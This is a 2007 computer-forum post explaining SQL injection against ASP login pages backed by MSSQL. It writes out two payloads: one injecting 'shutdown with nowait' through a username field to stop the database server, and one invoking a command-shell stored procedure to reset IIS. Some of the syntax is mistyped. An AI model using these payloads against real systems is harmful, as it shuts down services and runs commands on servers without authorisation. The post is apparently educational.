Computer Forums

Member Login

Remember Me? Sign Up! | Forgot Password
 
Slogan
 
Closed Thread
Old 08-31-2007, 01:55 PM   #1 (permalink)
Osiris's Avatar
 

Join Date: Jan 2005

Location: Kentucky

Posts: 32,180

Osiris is a jewel in the roughOsiris is a jewel in the roughOsiris is a jewel in the rough

Send a message via ICQ to Osiris Send a message via AIM to Osiris Send a message via MSN to Osiris Send a message via Yahoo to Osiris Send a message via Skype™ to Osiris
Default SQL Injection

One of the more dangerous SQL commands is SHUTDOWN WITH NOWAIT, which works as advertised and would lock everyone out. The attacker would type in the following username field:

' ; shutdown with nowait; -_

The following would happen if inserted into the ASP Script:

select uName from users where uName=';
shutdown with nowait;--' and uPass='


Execute strored procedures.

MSSQL has several extedned (DLL Based) stored procedures that can cause some serious hard to the server itself.

These can be executed by injecting them into the ASP page thr the forms fields:

';exec master..xo_cmdshell ; iireset';--

This wold reset the IIS server through the command line shell. This is harmful if the application is connected with an SA or equivalent account.
__________________
Osiris is offline  
 
Closed Thread

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


Similar Threads
Thread Thread Starter Forum Replies Last Post
vBulleting Forum installed last night; SQL Error #1226 Today Slam'n Systems Browser & General Internet Questions 0 07-11-2007 06:13 PM
SQL and Access Database with Flash Interface djmaddogfreak Web Site Hosting / ISP Q & A 2 05-08-2007 04:16 PM